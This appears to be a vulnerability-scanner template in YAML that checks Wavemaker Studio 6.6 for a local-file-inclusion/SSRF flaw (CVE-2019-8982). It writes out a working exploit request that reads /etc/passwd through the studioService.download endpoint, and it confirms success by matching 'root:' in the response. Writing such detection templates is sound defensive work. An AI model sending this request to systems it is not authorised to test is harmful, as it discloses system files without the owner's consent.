id: wavemaker-studio-lfi
info:
  name: Wavemaker Studio 6.6 LFI/SSRF (CVE-2019-8982)
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "bin/bash") && StringSearch("body", "root:")
